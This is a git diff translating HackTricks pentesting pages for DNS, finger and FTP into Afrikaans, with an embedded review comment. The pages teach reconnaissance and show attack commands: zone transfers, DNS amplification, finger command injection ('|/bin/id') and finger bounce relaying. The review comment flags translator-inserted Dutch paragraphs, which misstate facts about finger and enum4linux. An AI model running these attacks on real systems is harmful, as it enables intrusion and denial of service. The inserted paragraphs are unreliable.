+Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by AD-servers: + +- **Domain Controllers (DCs)**: Dit is die kern van 'n AD-omgewing en bevat die gebruikersrekenaars, groepe en beleide. Dit is die primêre doelwit vir aanvallers, aangesien dit toegang tot die hele AD-omgewing kan gee. +- **Global Catalog (GC)**: Die GC is 'n spesiale tipe DC wat 'n gedeeltelike replikasie van alle objekte in die AD-omgewing bevat. Dit maak dit makliker om soekvrae uit te voer en gebruikersinligting te vind. +- **LDAP**: Die Lightweight Directory Access Protocol (LDAP) is die protokol wat gebruik word om te kommunikeer met AD-servers. Dit maak dit moontlik om te soek, te lees en te skryf na die AD-databasis. +- **Kerberos**: Dit is die standaard-verifikasieprotokol wat deur AD gebruik word. Dit is belangrik om te verstaan hoe Kerberos werk en hoe dit gebruik kan word om toegang te verkry tot AD-bronne. +- **DNS**: Die Domain Name System (DNS) is noodsaaklik vir die funksionering van AD. Dit vertaal domeinname na IP-adresse en maak dit moontlik vir rekenaars om met mekaar te kommunikeer. +- **Group Policy Objects (GPOs)**: GPO's is beleidsinstellings wat op AD-objekte toegepas kan word. Dit kan gebruik word om sekuriteitsbeleide af te dwing en toegang tot hulpbronne te beperk. + +Deur 'n goeie begrip van AD-servers te hê, kan 'n pentester die omgewing beter assesseer en moontlike aanvals ```bash dig -t _gc._tcp.lab.domain.com dig -t _ldap._tcp.lab.domain.com 
@@ -165,61 +291,72 @@ nslookup -type=srv _kerberos._tcp.domain.com nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='domain.com'" ``` - ### DNSSec -```bash - #Query paypal subdomains to ns3.isc-sns.info - nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal.com ns3.isc-sns.info -``` +DNSSec (Domain Name System Security Extensions) is 'n sekuriteitsuitbreiding vir die Domain Name System (DNS) wat ontwerp is om die integriteit en veiligheid van DNS-inligting te verbeter. Dit voeg 'n laag van sekuriteit by die DNS-protokol deur die ondertekening van DNS-rekords met digitale handtekeninge. Hierdie handtekeninge kan dan geverifieer word deur DNS-kliënte om te verseker dat die ontvangste DNS-inligting nie gewysig of vervals is nie. +DNSSec beskerm teen aanvalle soos DNS-spoofing, waar 'n aanvaller valse DNS-inligting versprei om gebruikers na 'n kwaadwillige webwerf te stuur. Dit beskerm ook teen DNS-cache-vergiftiging, waar 'n aanvaller valse DNS-inligting in 'n DNS-kas plaas om gebruikers na 'n kwaadwillige webwerf te stuur. + +Om DNSSec te implementeer, moet 'n domeinnaameienaar DNS-rekords onderteken met 'n privaat sleutel en die ooreenstemmende openbare sleutel publiseer in die DNS. Wanneer 'n DNS-kliënt 'n DNS-rekord ontvang, kan dit die handtekening verifieer deur die ooreenstemmende openbare sleutel te gebruik. As die handtekening geldig is, kan die DNS-kliënt verseker dat die ontvangste DNS-inligting nie gewysig is nie. + +DNSSec is 'n belangrike tegniek vir die verbetering van die veiligheid van die DNS en die beskerming teen aanvalle op DNS-inligting. Dit word aanbeveel dat domeinnaameienaars DNSSec implementeer om die integriteit en veiligheid van hul DNS-inligting te verseker. +```bash +#Query paypal subdomains to ns3.isc-sns.info +nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal.com ns3.isc-sns.info +``` ### IPv6 -Brute force using "AAAA" requests to gather IPv6 of the subdomains. 
- +Brute force deur gebruik te maak van "AAAA" versoeke om die IPv6-adresse van die subdomeine te versamel. ```bash dnsdict6 -s -t ``` +# Bruteforce omgekeerde DNS in gebruik van IPv6-adresse -Bruteforce reverse DNS in using IPv6 addresses +Omgekeerde DNS, ook bekend as omgekeerde DNS-opsoek, is 'n proses waardeur 'n IP-adres vertaal word na 'n domeinnaam. Dit kan nuttig wees tydens pentesting, omdat dit kan help om inligting oor die doelwit se infrastruktuur te bekom. +Om omgekeerde DNS vir IPv6-adresse te bruteforce, kan jy die volgende stappe volg: + +1. Identifiseer die IPv6-adres wat jy wil ondersoek. +2. Gebruik 'n gereedskap soos `dnsrecon` of `dnsenum` om 'n lys moontlike domeinname te genereer wat gekoppel kan wees aan die IPv6-adres. +3. Voer 'n bruteforce-aanval uit deur die gereedskap te gebruik om elke moontlike domeinnaam te ondersoek en te kyk of dit gekoppel is aan die IPv6-adres. +4. Analiseer die resultate en identifiseer enige relevante domeinname wat gekoppel is aan die IPv6-adres. + +Dit is belangrik om te onthou dat omgekeerde DNS-bruteforce 'n tydrowende proses kan wees, veral vir IPv6-adresse wat 'n groot aantal moontlike domeinname kan hê. Dit kan ook 'n hoë volume van navrae na die DNS-infrastruktuur veroorsaak, wat 'n potensiële rooi vlag vir die doelwit se beveiliging kan wees. + +Dit is dus raadsaam om hierdie tegniek met omsigtigheid en in ooreenstemming met die toepaslike wetlike en etiese riglyne te gebruik. ```bash dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns.ripe.net ``` +### DNS Rekursie DDoS -### DNS Recursion DDoS - -If **DNS recursion is enabled**, an attacker could **spoof** the **origin** on the UDP packet in order to make the **DNS send the response to the victim server**. 
An attacker could abuse **ANY** or **DNSSEC** record types as they use to have the bigger responses.\ -The way to **check** if a DNS supports **recursion** is to query a domain name and **check** if the **flag "ra"** (_recursion available_) is in the response: - +Indien **DNS rekursie geaktiveer** is, kan 'n aanvaller die **oorsprong** op die UDP-pakket vervals om die **DNS om die respons na die slagofferserver te stuur**. 'n Aanvaller kan **ENIGE** of **DNSSEC** rekordtipes misbruik, aangesien hulle geneig is om die grootste respons te hê.\ +Die manier om te **verifieer** of 'n DNS **rekursie** ondersteun, is om 'n domeinnaam te ondervra en te **kyk** of die vlag "ra" (_rekursie beskikbaar_) in die respons is: ```bash dig google.com A @ ``` - -**Non available**: +**Nie beskikbaar**: ![](<../.gitbook/assets/image (275).png>) -**Available**: +**Beskikbaar**: ![](<../.gitbook/assets/image (276).png>)
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -### Mail to nonexistent account +### E-pos na 'n nie-bestaande rekening -Through the examination of a nondelivery notification (NDN) triggered by an email sent to an invalid address within a target domain, valuable internal network details are often disclosed. +Deur die ondersoek van 'n nie-lewering-kennisgewing (NDN) wat geaktiveer word deur 'n e-pos wat gestuur is na 'n ongeldige adres binne 'n teikendomein, word waardevolle interne netwerkdetails dikwels bekendgemaak. -The provided nondelivery report includes information such as: - -- The generating server was identified as `server.example.com`. -- A failure notice for `user@example.com` with the error code `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` was returned. -- Internal IP addresses and hostnames were disclosed in the original message headers. +Die verskafte nie-lewering-verslag bevat inligting soos: +- Die genererende bediener is geïdentifiseer as `server.example.com`. +- 'n Foutkennisgewing vir `user@example.com` met die foutkode `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` is teruggekeer. +- Interne IP-adresse en gasheernaam is bekendgemaak in die oorspronklike boodskaphoofstukke. 
```markdown The original message headers were modified for anonymity and now present randomized data: 
@@ -243,9 +380,23 @@ filter.example.com with ESMTP id xVNPkwaqGgdyH5Ag for user@example.com; Mon, X-Envelope-From: sender@anotherdomain.org X-Apparent-Source-IP: 198.51.100.37 ``` +## Konfigurasie lêers -## Config files +Config files, or configuration files, are files that contain settings and parameters for various software applications. These files are used to customize the behavior of the software and can be found in different locations depending on the operating system and the specific application. +Konfigurasie lêers, of konfigurasie lêers, is lêers wat instellings en parameters vir verskeie sagtewaretoepassings bevat. Hierdie lêers word gebruik om die gedrag van die sagteware aan te pas en kan in verskillende plekke gevind word, afhangende van die bedryfstelsel en die spesifieke toepassing. + +Config files are commonly used in the context of network services, including DNS (Domain Name System). In the case of DNS, the config file is typically located in the `/etc` directory and is named `named.conf` or `named.conf.options`. + +Konfigurasie lêers word algemeen gebruik in die konteks van netwerkdienste, insluitend DNS (Domain Name System). In die geval van DNS is die konfigurasie lêer tipies geleë in die `/etc` gids en word dit genoem `named.conf` of `named.conf.options`. + +These config files contain important information such as the IP addresses of DNS servers, domain zone configurations, and access control rules. By analyzing and manipulating these config files, a hacker can potentially gain unauthorized access, redirect DNS queries, or perform other malicious activities. + +Hierdie konfigurasie lêers bevat belangrike inligting soos die IP-adresse van DNS-bedieners, domein-sone-konfigurasies en toegangsbeheer-reëls. Deur hierdie konfigurasie lêers te analiseer en te manipuleer, kan 'n hacker moontlik ongemagtigde toegang verkry, DNS-navrae omlei of ander skadelike aktiwiteite uitvoer. 
+ +It is important for pentesters and system administrators to review and secure these config files to prevent potential vulnerabilities and unauthorized access. + +Dit is belangrik vir pentesters en stelseladministrateurs om hierdie konfigurasie lêers te hersien en te beveilig om potensiële kwesbaarhede en ongemagtigde toegang te voorkom. ``` host.conf /etc/resolv.conf 
@@ -255,91 +406,88 @@ host.conf /etc/bind/named.conf.log /etc/bind/* ``` +Gevaarlike instellings wanneer 'n Bind-bediener gekonfigureer word: -Dangerous settings when configuring a Bind server: - -| **Option** | **Description** | +| **Opsie** | **Beskrywing** | | ----------------- | ------------------------------------------------------------------------------ | -| `allow-query` | Defines which hosts are allowed to send requests to the DNS server. | -| `allow-recursion` | Defines which hosts are allowed to send recursive requests to the DNS server. | -| `allow-transfer` | Defines which hosts are allowed to receive zone transfers from the DNS server. | -| `zone-statistics` | Collects statistical data of zones. | +| `allow-query` | Definieer watter gasheerse is toegelaat om navrae na die DNS-bediener te stuur. | +| `allow-recursion` | Definieer watter gasheerse is toegelaat om herhalende navrae na die DNS-bediener te stuur. | +| `allow-transfer` | Definieer watter gasheerse is toegelaat om sone-oordragte van die DNS-bediener te ontvang. | +| `zone-statistics` | Versamel statistiese data van sones. | -## References +## Verwysings * [https://www.myrasecurity.com/en/knowledge-hub/dns/](https://www.myrasecurity.com/en/knowledge-hub/dns/) -* Book: **Network Security Assessment 3rd edition** - -## HackTricks Automatic Commands +* Boek: **Network Security Assessment 3rd edition** +## HackTricks Outomatiese Opdragte ``` Protocol_Name: DNS #Protocol Abbreviation if there is one. Port_Number: 53 #Comma separated if there is more than one. 
Protocol_Description: Domain Name Service #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for DNS - Note: | - #These are the commands I run every time I see an open DNS port +Name: Notes +Description: Notes for DNS +Note: | +#These are the commands I run every time I see an open DNS port - dnsrecon -r 127.0.0.0/24 -n {IP} -d {Domain_Name} - dnsrecon -r 127.0.1.0/24 -n {IP} -d {Domain_Name} - dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name} - dig axfr @{IP} - dig axfr {Domain_Name} @{IP} - nslookup - SERVER {IP} - 127.0.0.1 - {IP} - Domain_Name - exit +dnsrecon -r 127.0.0.0/24 -n {IP} -d {Domain_Name} +dnsrecon -r 127.0.1.0/24 -n {IP} -d {Domain_Name} +dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name} +dig axfr @{IP} +dig axfr {Domain_Name} @{IP} +nslookup +SERVER {IP} +127.0.0.1 +{IP} +Domain_Name +exit - https://book.hacktricks.xyz/pentesting/pentesting-dns +https://book.hacktricks.xyz/pentesting/pentesting-dns Entry_2: - Name: Banner Grab - Description: Grab DNS Banner - Command: dig version.bind CHAOS TXT @DNS +Name: Banner Grab +Description: Grab DNS Banner +Command: dig version.bind CHAOS TXT @DNS Entry_3: - Name: Nmap Vuln Scan - Description: Scan for Vulnerabilities with Nmap - Command: nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" {IP} +Name: Nmap Vuln Scan +Description: Scan for Vulnerabilities with Nmap +Command: nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" {IP} Entry_4: - Name: Zone Transfer - Description: Three attempts at forcing a zone transfer - Command: dig axfr @{IP} && dix axfr @{IP} {Domain_Name} && fierce --dns-servers {IP} --domain {Domain_Name} +Name: Zone Transfer +Description: Three attempts at forcing a zone transfer +Command: dig axfr @{IP} && dix axfr @{IP} {Domain_Name} && fierce --dns-servers {IP} --domain {Domain_Name} Entry_5: - Name: Active Directory - Description: Eunuerate a 
DC via DNS - Command: dig -t _gc._{Domain_Name} && dig -t _ldap._{Domain_Name} && dig -t _kerberos._{Domain_Name} && dig -t _kpasswd._{Domain_Name} && nmap --script dns-srv-enum --script-args "dns-srv-enum.domain={Domain_Name}" - -Entry_6: - Name: consolesless mfs enumeration - Description: DNS enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' -``` +Name: Active Directory +Description: Eunuerate a DC via DNS +Command: dig -t _gc._{Domain_Name} && dig -t _ldap._{Domain_Name} && dig -t _kerberos._{Domain_Name} && dig -t _kpasswd._{Domain_Name} && nmap --script dns-srv-enum --script-args "dns-srv-enum.domain={Domain_Name}" +Entry_6: +Name: consolesless mfs enumeration +Description: DNS enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' +```
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/pentesting-finger.md b/network-services-pentesting/pentesting-finger.md index 5507dab46..ef202e479 100644 --- a/network-services-pentesting/pentesting-finger.md +++ b/network-services-pentesting/pentesting-finger.md @@ -2,92 +2,86 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Info** +## **Basiese Inligting** -The **Finger** program/service is utilized for retrieving details about computer users. Typically, the information provided includes the **user's login name, full name**, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user's plan and project files. - -**Default port:** 79 +Die **Finger** program/diens word gebruik om inligting oor rekenaargebruikers te bekom. Tipies sluit die verskafte inligting die **gebruikers se aanmeldingsnaam, volle naam** en, in sommige gevalle, addisionele besonderhede in. Hierdie addisionele besonderhede kan die kantoorlokasie en telefoonnommer (indien beskikbaar), die tyd waarop die gebruiker aangemeld het, die tydperk van onaktiwiteit (idle time), die laaste keer wat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan- en projeklêers insluit. +**Verstekpoort:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` +## **Opname** -## **Enumeration** - -### **Banner Grabbing/Basic connection** - +### **Banner Grabbing/ Basiese verbinding** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` +### **Gebruikersopsporing** -### **User enumeration** +User enumeration, ook wel bekend als fingerdienst, is een techniek die wordt gebruikt om informatie te verzamelen over gebruikers op een doelsysteem. Het maakt gebruik van de Finger-protocoldienst om informatie zoals gebruikersnamen, volledige namen, e-mailadressen en andere details te verkrijgen. +De Finger-protocoldienst is standaard geïnstalleerd op veel Unix-gebaseerde systemen. Het stelt gebruikers in staat om informatie over andere gebruikers op te vragen door simpelweg hun gebruikersnaam in te voeren. 
Deze informatie kan nuttig zijn voor een aanvaller, omdat het hen kan helpen bij het identificeren van mogelijke doelwitten en het vergroten van hun kennis over het doelsysteem. + +Om gebruikersopsporing uit te voeren, kan een aanvaller verschillende tools en technieken gebruiken, zoals het gebruik van de `finger`-opdracht op de opdrachtregel, het gebruik van geautomatiseerde scripts of het gebruik van specifieke tools zoals `enum4linux` voor Windows-systemen. + +Het is belangrijk op te merken dat gebruikersopsporing een potentieel risico vormt voor de privacy en beveiliging van gebruikers. Daarom is het belangrijk voor systeembeheerders om de Finger-protocoldienst uit te schakelen of te beperken om ongeautoriseerde toegang tot gebruikersinformatie te voorkomen. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` - -Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples: - +Alternatiewelik kan jy **finger-user-enum** van [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) gebruik, hier is 'n paar voorbeelde: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` +#### **Nmap voer 'n skrip uit om standaard skripte te gebruik** -#### **Nmap execute a script for doing using default scripts** - -### Metasploit uses more tricks than Nmap - +### Metasploit gebruik meer truuks as Nmap ``` use auxiliary/scanner/finger/finger_users ``` - ### Shodan -* `port:79 USER` - -## Command execution +* `port:79 GEBRUIKER` +## Opdrag uitvoering ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` +## Vinger Stuiter -## Finger Bounce - -[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) - +[Gebruik 'n stelsel as 'n vinger relais](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` 
finger user@host@victim finger @internal@external ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
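Review bot: the new `### **Gebruikersopsporing**` section in this hunk inserts three paragraphs that translate nothing in the removed English lines and are written in Dutch rather than Afrikaans ("User enumeration, ook wel bekend als fingerdienst, is een techniek die wordt gebruikt..."). The inserted text is also wrong on the facts: user enumeration is not "also known as the finger service", and `enum4linux` is an SMB/Samba enumeration tool that has nothing to do with finger "voor Windows-systemen". Drop the added paragraphs and keep only the translated heading directly above the `finger @` code block, as in the English original. Three smaller points in the same hunk: the Shodan query `port:79 USER` became `port:79 GEBRUIKER`, which breaks the literal search string and must be restored; `## **Opname**` for "Enumeration" is inconsistent with `## Enumerasie` used for the same heading in the FTP page of this very PR, so use `Enumerasie` in both; and `## Vinger Stuiter` literally translates an attack name that the book treats as a term, so keep it as `## Finger Bounce`, consistent with `Banner Grabbing` being left untranslated two headings earlier in this file. The heading `#### **Nmap voer 'n skrip uit om standaard skripte te gebruik**` is also not a meaningful rendering of the English line; "Nmap voer dit met sy standaard-skripte uit" says what the original meant.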
diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 9854a3549..91950e6a2 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -2,123 +2,121 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -The **File Transfer Protocol (FTP)** serves as a standard protocol for file transfer across a computer network between a server and a client.\ -It is a **plain-text** protocol that uses as **new line character `0x0d 0x0a`** so sometimes you need to **connect using `telnet`** or **`nc -C`**. - -**Default Port:** 21 +Die **File Transfer Protocol (FTP)** dien as 'n standaardprotokol vir die oordrag van lêers oor 'n rekenaarstelsel tussen 'n bediener en 'n kliënt.\ +Dit is 'n **plain-text**-protokol wat gebruik maak van die **new line character `0x0d 0x0a`**, so soms moet jy **verbind met behulp van `telnet`** of **`nc -C`**. +**Verstekpoort:** 21 ``` PORT STATE SERVICE 21/tcp open ftp ``` +### Verbindings Aktief & Passief -### Connections Active & Passive +In **Aktiewe FTP** inisieer die FTP **kliënt** eers die beheer **verbindings** vanaf sy poort N na die FTP-bediener se bevelspoort - poort 21. Die **kliënt** luister dan na poort **N+1** en stuur die poort N+1 na die FTP-bediener. Die FTP **Bediener** inisieer dan die data **verbindings**, vanaf **sy poort M na die poort N+1** van die FTP-kliënt. 
-In **Active FTP** the FTP **client** first **initiates** the control **connection** from its port N to FTP Servers command port – port 21. The **client** then **listens** to port **N+1** and sends the port N+1 to FTP Server. FTP **Server** then **initiates** the data **connection**, from **its port M to the port N+1** of the FTP Client. +Maar, as die FTP-kliënt 'n vuurwal opset wat die inkomende data-verbindings van buite beheer, kan aktiewe FTP 'n probleem wees. En 'n uitvoerbare oplossing hiervoor is Passiewe FTP. -But, if the FTP Client has a firewall setup that controls the incoming data connections from outside, then active FTP may be a problem. And, a feasible solution for that is Passive FTP. +In **Passiewe FTP** inisieer die kliënt die beheer verbindings vanaf sy poort N na die poort 21 van die FTP-bediener. Hierna gee die kliënt 'n **passv bevel** uit. Die bediener stuur dan een van sy poortnommers M na die kliënt. En die **kliënt** inisieer die data **verbindings** vanaf **sy poort P na poort M** van die FTP-bediener. -In **Passive FTP**, the client initiates the control connection from its port N to the port 21 of FTP Server. After this, the client issues a **passv comand**. The server then sends the client one of its port number M. And the **client** **initiates** the data **connection** from **its port P to port M** of the FTP Server. +Bron: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/) -Source: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/) +### Verbindingsfoutopsporing -### Connection debugging +Die **FTP** opdragte **`debug`** en 